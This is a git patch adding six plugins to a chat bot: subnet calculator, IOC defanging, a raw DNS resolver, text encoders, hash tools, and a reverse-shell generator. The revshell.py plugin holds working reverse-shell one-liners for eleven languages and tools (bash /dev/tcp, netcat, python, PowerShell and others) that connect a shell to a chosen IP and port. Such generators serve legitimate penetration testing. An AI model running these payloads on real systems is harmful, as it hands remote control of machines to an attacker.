From 2e2378d3ee629d1b7eb6af8a701a37a665f6b888 Mon Sep 17 00:00:00 2001 From: user Date: Sun, 15 Feb 2026 01:46:13 +0100 Subject: [PATCH] feat: add wave 1 plugins (dns, encode, hash, defang, revshell, cidr) All pure stdlib, zero external dependencies: - dns: raw UDP resolver with A/AAAA/MX/NS/TXT/CNAME/PTR/SOA - encode: base64, hex, URL, ROT13 encode/decode - hash: md5/sha1/sha256/sha512 generation + type identification - defang: IOC defanging/refanging for safe sharing - revshell: reverse shell one-liners for 11 languages - cidr: subnet calculator with IP membership check Co-Authored-By: Claude Opus 4.6 --- plugins/cidr.py | 78 ++++++++++++++++ plugins/defang.py | 49 ++++++++++ plugins/dns.py | 222 ++++++++++++++++++++++++++++++++++++++++++++ plugins/encode.py | 75 +++++++++++++++ plugins/hash.py | 75 +++++++++++++++ plugins/revshell.py | 111 ++++++++++++++++++++++ 6 files changed, 610 insertions(+) create mode 100644 plugins/cidr.py create mode 100644 plugins/defang.py create mode 100644 plugins/dns.py create mode 100644 plugins/encode.py create mode 100644 plugins/hash.py create mode 100644 plugins/revshell.py diff --git a/plugins/cidr.py b/plugins/cidr.py new file mode 100644 index 0000000..15accd4 --- /dev/null +++ b/plugins/cidr.py @@ -0,0 +1,78 @@ +"""Plugin: CIDR/subnet calculator.""" + +from __future__ import annotations + +import ipaddress + +from derp.plugin import command + + +@command("cidr", help="Subnet info: !cidr | !cidr contains ") +async def cmd_cidr(bot, message): + """Calculate subnet properties or check IP membership. + + !cidr 192.168.1.0/24 + !cidr contains 10.0.0.0/8 10.1.2.3 + """ + parts = message.text.split() + if len(parts) < 2: + await bot.reply(message, "Usage: !cidr | !cidr contains ") + return + + subcmd = parts[1].lower() + + if subcmd == "contains" and len(parts) >= 4: + await _contains(bot, message, parts[2], parts[3]) + elif subcmd == "contains": + await bot.reply(message, "Usage: !cidr contains ") + else: + await _info(bot, message, parts[1]) + + +async def _info(bot, message, network_str: str) -> None: + """Show subnet information.""" + try: + net = ipaddress.ip_network(network_str, strict=False) + except ValueError: + await bot.reply(message, f"Invalid network: {network_str}") + return + + if isinstance(net, ipaddress.IPv4Network): + host_count = net.num_addresses - 2 if net.prefixlen < 31 else net.num_addresses + parts = [ + f"net:{net.network_address}/{net.prefixlen}", + f"range:{net[0]}-{net[-1]}", + f"hosts:{host_count}", + f"mask:{net.netmask}", + f"wildcard:{net.hostmask}", + ] + if net.prefixlen < 31: + parts.append(f"broadcast:{net.broadcast_address}") + else: + parts = [ + f"net:{net.network_address}/{net.prefixlen}", + f"range:{net[0]}-{net[-1]}", + f"hosts:{net.num_addresses}", + ] + + await bot.reply(message, " | ".join(parts)) + + +async def _contains(bot, message, network_str: str, ip_str: str) -> None: + """Check if an IP belongs to a network.""" + try: + net = ipaddress.ip_network(network_str, strict=False) + except ValueError: + await bot.reply(message, f"Invalid network: {network_str}") + return + + try: + addr = ipaddress.ip_address(ip_str) + except ValueError: + await bot.reply(message, f"Invalid IP: {ip_str}") + return + + if addr in net: + await bot.reply(message, f"{addr} is in {net}") + else: + await bot.reply(message, f"{addr} is NOT in {net}") diff --git a/plugins/defang.py b/plugins/defang.py new file mode 100644 index 0000000..b2db473 --- /dev/null +++ b/plugins/defang.py @@ -0,0 +1,49 @@ +"""Plugin: defang and refang IOCs for safe sharing.""" + +from __future__ import annotations + +import re + +from derp.plugin import command + + +def _defang(text: str) -> str: + """Defang a URL, domain, or IP for safe sharing.""" + # Protocols + text = re.sub(r"https?://", lambda m: m.group().replace("://", "[://]"), text) + text = re.sub(r"ftp://", "ftp[://]", text) + # Dots in domains/IPs (but not in paths after first slash) + parts = text.split("/", 1) + parts[0] = parts[0].replace(".", "[.]") + return "/".join(parts) + + +def _refang(text: str) -> str: + """Reverse defanging to restore usable IOCs.""" + text = text.replace("[://]", "://") + text = text.replace("[.]", ".") + text = text.replace("hxxp", "http") + text = text.replace("hXXp", "http") + text = text.replace("[at]", "@") + text = text.replace("[AT]", "@") + return text + + +@command("defang", help="Defang IOCs: !defang ") +async def cmd_defang(bot, message): + """Defang URLs, IPs, and domains for safe pasting.""" + parts = message.text.split(None, 1) + if len(parts) < 2: + await bot.reply(message, "Usage: !defang ") + return + await bot.reply(message, _defang(parts[1])) + + +@command("refang", help="Refang IOCs: !refang ") +async def cmd_refang(bot, message): + """Restore defanged IOCs to usable form.""" + parts = message.text.split(None, 1) + if len(parts) < 2: + await bot.reply(message, "Usage: !refang ") + return + await bot.reply(message, _refang(parts[1])) diff --git a/plugins/dns.py b/plugins/dns.py new file mode 100644 index 0000000..5b029ef --- /dev/null +++ b/plugins/dns.py @@ -0,0 +1,222 @@ +"""Plugin: DNS record lookup (raw UDP, pure stdlib).""" + +from __future__ import annotations + +import asyncio +import ipaddress +import os +import socket +import struct + +from derp.plugin import command + +_QTYPES = { + "A": 1, "NS": 2, "CNAME": 5, "SOA": 6, + "PTR": 12, "MX": 15, "TXT": 16, "AAAA": 28, +} +_QTYPE_NAMES = {v: k for k, v in _QTYPES.items()} +_RCODES = { + 0: "", 1: "FORMERR", 2: "SERVFAIL", 3: "NXDOMAIN", + 4: "NOTIMP", 5: "REFUSED", +} + + +# -- wire format helpers -- + +def _get_resolver() -> str: + """Read first IPv4 nameserver from /etc/resolv.conf.""" + try: + with open("/etc/resolv.conf") as f: + for line in f: + line = line.strip() + if line.startswith("nameserver"): + addr = line.split()[1] + try: + ipaddress.IPv4Address(addr) + return addr + except ValueError: + continue + except (OSError, IndexError): + pass + return "8.8.8.8" + + +def _encode_name(name: str) -> bytes: + """Encode a domain name into DNS wire format.""" + out = b"" + for label in name.rstrip(".").split("."): + out += bytes([len(label)]) + label.encode("ascii") + return out + b"\x00" + + +def _decode_name(data: bytes, offset: int) -> tuple[str, int]: + """Decode a DNS name with pointer compression.""" + labels: list[str] = [] + jumped = False + ret_offset = offset + jumps = 0 + while offset < len(data): + length = data[offset] + if length == 0: + if not jumped: + ret_offset = offset + 1 + break + if (length & 0xC0) == 0xC0: + if not jumped: + ret_offset = offset + 2 + ptr = struct.unpack_from("!H", data, offset)[0] & 0x3FFF + offset = ptr + jumped = True + jumps += 1 + if jumps > 20: + break + continue + offset += 1 + labels.append(data[offset:offset + length].decode("ascii", errors="replace")) + offset += length + if not jumped: + ret_offset = offset + return ".".join(labels), ret_offset + + +def _build_query(name: str, qtype: int) -> bytes: + """Build a DNS query packet.""" + tid = os.urandom(2) + flags = struct.pack("!H", 0x0100) + counts = struct.pack("!HHHH", 1, 0, 0, 0) + return tid + flags + counts + _encode_name(name) + struct.pack("!HH", qtype, 1) + + +def _parse_rdata(rtype: int, data: bytes, offset: int, rdlength: int) -> str: + """Parse an RR's rdata into a human-readable string.""" + rdata = data[offset:offset + rdlength] + if rtype == 1 and rdlength == 4: + return socket.inet_ntoa(rdata) + if rtype == 28 and rdlength == 16: + return socket.inet_ntop(socket.AF_INET6, rdata) + if rtype in (2, 5, 12): # NS, CNAME, PTR + name, _ = _decode_name(data, offset) + return name + if rtype == 15: # MX + pref = struct.unpack_from("!H", rdata, 0)[0] + mx, _ = _decode_name(data, offset + 2) + return f"{pref} {mx}" + if rtype == 16: # TXT + parts: list[str] = [] + pos = 0 + while pos < rdlength: + tlen = rdata[pos] + pos += 1 + parts.append(rdata[pos:pos + tlen].decode("utf-8", errors="replace")) + pos += tlen + return "".join(parts) + if rtype == 6: # SOA + mname, off = _decode_name(data, offset) + rname, off = _decode_name(data, off) + serial = struct.unpack_from("!I", data, off)[0] + return f"{mname} {rname} {serial}" + return rdata.hex() + + +def _parse_response(data: bytes) -> tuple[int, list[str]]: + """Parse a DNS response, returning (rcode, [values]).""" + if len(data) < 12: + return 2, [] + _, flags, qdcount, ancount = struct.unpack_from("!HHHH", data, 0) + rcode = flags & 0x0F + offset = 12 + for _ in range(qdcount): + _, offset = _decode_name(data, offset) + offset += 4 + results: list[str] = [] + for _ in range(ancount): + if offset + 10 > len(data): + break + _, offset = _decode_name(data, offset) + rtype, _, _, rdlength = struct.unpack_from("!HHIH", data, offset) + offset += 10 + if offset + rdlength > len(data): + break + results.append(_parse_rdata(rtype, data, offset, rdlength)) + offset += rdlength + return rcode, results + + +async def _query(name: str, qtype: int, server: str, + timeout: float = 5.0) -> tuple[int, list[str]]: + """Send a DNS query and return (rcode, [values]).""" + query = _build_query(name, qtype) + sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + sock.settimeout(timeout) + loop = asyncio.get_running_loop() + try: + await loop.run_in_executor(None, sock.sendto, query, (server, 53)) + data = await asyncio.wait_for( + loop.run_in_executor(None, sock.recv, 4096), + timeout=timeout, + ) + return _parse_response(data) + except (TimeoutError, socket.timeout): + return -1, [] + except OSError: + return -2, [] + finally: + sock.close() + + +def _reverse_name(addr: str) -> str: + """Convert an IP address to its reverse DNS name.""" + ip = ipaddress.ip_address(addr) + if isinstance(ip, ipaddress.IPv4Address): + return ".".join(reversed(addr.split("."))) + ".in-addr.arpa" + expanded = ip.exploded.replace(":", "") + return ".".join(reversed(expanded)) + ".ip6.arpa" + + +@command("dns", help="DNS lookup: !dns [A|AAAA|MX|NS|TXT|CNAME|PTR|SOA]") +async def cmd_dns(bot, message): + """Query DNS records for a domain or reverse-lookup an IP.""" + parts = message.text.split(None, 3) + if len(parts) < 2: + await bot.reply(message, "Usage: !dns [type]") + return + + target = parts[1] + qtype_str = parts[2].upper() if len(parts) > 2 else None + + # Auto-detect: IP -> PTR, domain -> A + if qtype_str is None: + try: + ipaddress.ip_address(target) + qtype_str = "PTR" + except ValueError: + qtype_str = "A" + + qtype = _QTYPES.get(qtype_str) + if qtype is None: + valid = ", ".join(sorted(_QTYPES)) + await bot.reply(message, f"Unknown type: {qtype_str} (valid: {valid})") + return + + lookup = target + if qtype_str == "PTR": + try: + lookup = _reverse_name(target) + except ValueError: + await bot.reply(message, f"Invalid IP for PTR: {target}") + return + + server = _get_resolver() + rcode, results = await _query(lookup, qtype, server) + + if rcode == -1: + await bot.reply(message, f"{target} {qtype_str}: timeout") + elif rcode == -2: + await bot.reply(message, f"{target} {qtype_str}: network error") + elif rcode != 0: + err = _RCODES.get(rcode, f"error {rcode}") + await bot.reply(message, f"{target} {qtype_str}: {err}") + elif not results: + await bot.reply(message, f"{target} {qtype_str}: no records") + else: + await bot.reply(message, f"{target} {qtype_str}: {', '.join(results)}") diff --git a/plugins/encode.py b/plugins/encode.py new file mode 100644 index 0000000..6f21634 --- /dev/null +++ b/plugins/encode.py @@ -0,0 +1,75 @@ +"""Plugin: encode and decode strings (base64, hex, URL, ROT13).""" + +from __future__ import annotations + +import base64 +import urllib.parse + +from derp.plugin import command + +_ROT13 = str.maketrans( + "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz", + "NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm", +) + +_ENCODERS: dict[str, tuple[str, callable]] = { + "b64": ("Base64", lambda t: base64.b64encode(t.encode()).decode()), + "hex": ("Hex", lambda t: t.encode().hex()), + "url": ("URL", lambda t: urllib.parse.quote(t, safe="")), + "rot13": ("ROT13", lambda t: t.translate(_ROT13)), +} + +_DECODERS: dict[str, tuple[str, callable]] = { + "b64": ("Base64", lambda t: base64.b64decode(t).decode("utf-8", errors="replace")), + "hex": ("Hex", lambda t: bytes.fromhex(t).decode("utf-8", errors="replace")), + "url": ("URL", lambda t: urllib.parse.unquote(t)), + "rot13": ("ROT13", lambda t: t.translate(_ROT13)), +} + +_FORMATS = ", ".join(_ENCODERS) + + +@command("encode", help=f"Encode text: !encode <{_FORMATS}> ") +async def cmd_encode(bot, message): + """Encode text in the specified format.""" + parts = message.text.split(None, 2) + if len(parts) < 3: + await bot.reply(message, f"Usage: !encode <{_FORMATS}> ") + return + + fmt = parts[1].lower() + text = parts[2] + + entry = _ENCODERS.get(fmt) + if entry is None: + await bot.reply(message, f"Unknown format: {fmt} (valid: {_FORMATS})") + return + + try: + result = entry[1](text) + await bot.reply(message, result) + except Exception as exc: + await bot.reply(message, f"Encode error: {exc}") + + +@command("decode", help=f"Decode text: !decode <{_FORMATS}> ") +async def cmd_decode(bot, message): + """Decode text from the specified format.""" + parts = message.text.split(None, 2) + if len(parts) < 3: + await bot.reply(message, f"Usage: !decode <{_FORMATS}> ") + return + + fmt = parts[1].lower() + text = parts[2] + + entry = _DECODERS.get(fmt) + if entry is None: + await bot.reply(message, f"Unknown format: {fmt} (valid: {_FORMATS})") + return + + try: + result = entry[1](text) + await bot.reply(message, result) + except Exception as exc: + await bot.reply(message, f"Decode error: {exc}") diff --git a/plugins/hash.py b/plugins/hash.py new file mode 100644 index 0000000..6e6845c --- /dev/null +++ b/plugins/hash.py @@ -0,0 +1,75 @@ +"""Plugin: hash strings and identify hash types.""" + +from __future__ import annotations + +import hashlib +import re + +from derp.plugin import command + +_ALGOS = ("md5", "sha1", "sha256", "sha512") + +# Patterns for hash identification (length -> possible types) +_HASH_PATTERNS: list[tuple[str, int, str]] = [ + (r"^[a-fA-F0-9]{32}$", 32, "MD5"), + (r"^[a-fA-F0-9]{40}$", 40, "SHA-1"), + (r"^[a-fA-F0-9]{56}$", 56, "SHA-224"), + (r"^[a-fA-F0-9]{64}$", 64, "SHA-256 / SHA3-256"), + (r"^[a-fA-F0-9]{96}$", 96, "SHA-384 / SHA3-384"), + (r"^[a-fA-F0-9]{128}$", 128, "SHA-512 / SHA3-512"), + (r"^\$2[aby]\$\d{2}\$.{53}$", 0, "bcrypt"), + (r"^\$6\$", 0, "sha512crypt"), + (r"^\$5\$", 0, "sha256crypt"), + (r"^\$1\$", 0, "md5crypt"), + (r"^[a-fA-F0-9]{16}$", 16, "MySQL 3.x / Half MD5"), + (r"^\*[a-fA-F0-9]{40}$", 0, "MySQL 4.1+"), +] + + +@command("hash", help="Hash text: !hash [algo] ") +async def cmd_hash(bot, message): + """Generate hash digests. + + !hash hello -> MD5, SHA1, SHA256 + !hash sha512 hello -> specific algorithm + """ + parts = message.text.split(None, 2) + if len(parts) < 2: + await bot.reply(message, f"Usage: !hash [{'|'.join(_ALGOS)}] ") + return + + # Check if first arg is an algorithm name + if len(parts) >= 3 and parts[1].lower() in _ALGOS: + algo = parts[1].lower() + text = parts[2] + digest = hashlib.new(algo, text.encode()).hexdigest() + await bot.reply(message, f"{algo}: {digest}") + return + + # No algorithm specified -- show all common hashes + text = message.text.split(None, 1)[1] + results = [] + for algo in ("md5", "sha1", "sha256"): + digest = hashlib.new(algo, text.encode()).hexdigest() + results.append(f"{algo}:{digest}") + await bot.reply(message, " ".join(results)) + + +@command("hashid", help="Identify hash type: !hashid ") +async def cmd_hashid(bot, message): + """Identify a hash type by its format and length.""" + parts = message.text.split(None, 1) + if len(parts) < 2: + await bot.reply(message, "Usage: !hashid ") + return + + value = parts[1].strip() + matches = [] + for pattern, _, name in _HASH_PATTERNS: + if re.match(pattern, value): + matches.append(name) + + if matches: + await bot.reply(message, f"Possible: {', '.join(matches)}") + else: + await bot.reply(message, f"Unknown hash format (length: {len(value)})") diff --git a/plugins/revshell.py b/plugins/revshell.py new file mode 100644 index 0000000..8029bbf --- /dev/null +++ b/plugins/revshell.py @@ -0,0 +1,111 @@ +"""Plugin: reverse shell one-liner generator.""" + +from __future__ import annotations + +import ipaddress + +from derp.plugin import command + +_SHELLS: dict[str, str] = { + "bash": ( + "bash -i >& /dev/tcp/{ip}/{port} 0>&1" + ), + "sh": ( + "/bin/sh -i >& /dev/tcp/{ip}/{port} 0>&1" + ), + "nc": ( + "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {ip} {port} >/tmp/f" + ), + "nce": ( + "nc -e /bin/sh {ip} {port}" + ), + "python": ( + "python3 -c 'import socket,subprocess,os;" + "s=socket.socket();s.connect((\"{ip}\",{port}));" + "os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);" + "subprocess.call([\"/bin/sh\",\"-i\"])'" + ), + "perl": ( + "perl -e 'use Socket;" + "$i=\"{ip}\";$p={port};" + "socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));" + "connect(S,sockaddr_in($p,inet_aton($i)));" + "open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");" + "exec(\"/bin/sh -i\")'" + ), + "php": ( + "php -r '$s=fsockopen(\"{ip}\",{port});" + "exec(\"/bin/sh -i <&3 >&3 2>&3\");'" + ), + "ruby": ( + "ruby -rsocket -e'" + "f=TCPSocket.open(\"{ip}\",{port}).to_i;" + "exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'" + ), + "socat": ( + "socat TCP:{ip}:{port} EXEC:/bin/sh,pty,stderr,setsid,sigint,sane" + ), + "lua": ( + "lua -e \"require('socket');require('os');" + "t=socket.tcp();t:connect('{ip}','{port}');" + "os.execute('/bin/sh -i <&3 >&3 2>&3')\"" + ), + "ps": ( + "powershell -nop -c \"$c=New-Object Net.Sockets.TCPClient('{ip}',{port});" + "$s=$c.GetStream();[byte[]]$b=0..65535|%{{{{0}}}};while(($i=$s.Read($b,0," + "$b.Length))-ne 0){{$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);" + "$r=(iex $d 2>&1|Out-String);$sb=([text.encoding]::ASCII).GetBytes($r);" + "$s.Write($sb,0,$sb.Length)}}\"" + ), +} + + +@command("revshell", help="Reverse shell: !revshell ") +async def cmd_revshell(bot, message): + """Generate a reverse shell one-liner. + + !revshell bash 10.0.0.1 4444 + !revshell list + """ + parts = message.text.split() + if len(parts) < 2: + types = ", ".join(sorted(_SHELLS)) + await bot.reply(message, f"Usage: !revshell | types: {types}") + return + + shell_type = parts[1].lower() + + if shell_type == "list": + await bot.reply(message, f"Types: {', '.join(sorted(_SHELLS))}") + return + + if len(parts) < 4: + await bot.reply(message, "Usage: !revshell ") + return + + ip = parts[2] + port_str = parts[3] + + # Validate IP + try: + ipaddress.ip_address(ip) + except ValueError: + await bot.reply(message, f"Invalid IP: {ip}") + return + + # Validate port + try: + port = int(port_str) + if not 1 <= port <= 65535: + raise ValueError + except ValueError: + await bot.reply(message, f"Invalid port: {port_str}") + return + + template = _SHELLS.get(shell_type) + if template is None: + types = ", ".join(sorted(_SHELLS)) + await bot.reply(message, f"Unknown type: {shell_type} (valid: {types})") + return + + await bot.reply(message, template.format(ip=ip, port=port))